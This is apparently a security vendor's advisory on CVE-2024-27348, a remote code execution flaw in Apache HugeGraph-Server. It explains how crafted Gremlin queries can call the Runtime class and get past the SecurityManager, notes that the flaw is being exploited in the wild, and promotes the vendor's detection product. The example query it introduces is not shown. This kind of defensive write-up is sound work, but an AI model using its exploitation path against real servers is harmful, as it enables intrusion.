CVE-2024-27348 is a critical remote code execution (RCE) vulnerability in Apache HugeGraph-Server. HugeGraph is a convenient, efficient, and adaptable graph database compatible with the Apache TinkerPop3 framework and the Gremlin query language. It is the first graph database project in Apache.

This flaw enables unauthenticated attackers to execute arbitrary OS commands, potentially leading to unauthorized access, data manipulation, and full system compromise.

Affected Versions

The vulnerability impacts versions from 1.0.0 before 1.3.0 of Apache HugeGraph-Server running on Java8 and Java11.

Vulnerability Description

The root cause of CVE-2024-27348 lies in the way Apache HugeGraph-Server handles user inputs in Gremlin queries. The vulnerability allows attackers to send specially crafted Gremlin queries that exploit the GremlinGroovyScriptEngine class to execute arbitrary OS commands.

Gremlin Script Execution

The Gremlin script execution process involves the following steps:

• Script Compilation: The script is compiled using GremlinGroovyClassLoader, which adds necessary customizations through CompilerConfiguration.
• Script Caching: The script is checked for caching using the isCached method. If not cached, it is compiled and stored.
• Binding Retrieval: Bindings are retrieved from the ScriptContext to prepare the execution context.
• Function Invocation: The invokeFunction method is used to call methods, falling back on global functions if the method is not found.
• SecurityManager Checks: The HugeSecurityManager class is intended to enforce security checks by overriding various methods like checkPermission, checkExec, and checkRead. However, the vulnerability allows bypassing these checks under specific conditions.

Exploitation Path

An attacker can craft a Gremlin query that utilizes the Runtime class to execute system commands.

For Instance:

This query should typically trigger a SecurityException due to the restrictions imposed by the SecurityManager. However, in vulnerable versions, the security checks can be bypassed, allowing the execution of arbitrary commands.

The Shadowserver Foundation has published that they have observed in the wild exploitation attempts of this high severity vulnerability.

Fig. 1 - In the Wild exploitation reported

Exploitation Detection using Uptycs XDR

We exploited the vulnerability in our lab to execute Coinminer and other types of malware. Uptycs detects the malicious activity.

Fig. 2 - Detection of malicious activity (Detect-only mode) by Uptycs XDR

When blocking mode is enabled, all execution attempts are blocked at exploitation stage by Uptycs XDR as seen below.

Fig. 3 - Uptycs XDR killing the exploitation activities (Block mode)

Vulnerability Detection using Uptycs XDR

Uptycs XDR detects the vulnerable instance of Apache HugeGraph-Server running on a host/container.

Fig. 4 - Vulnerability Detection by Uptycs XDR

Conclusion

Apache HugeGraph is widely used across industries such as finance and healthcare. The discovery of CVE-2024-27348 and its active exploitation highlights the urgency for users to apply updates promptly. There is a critical need for robust security practices and proactive actions to stay protected from online threats.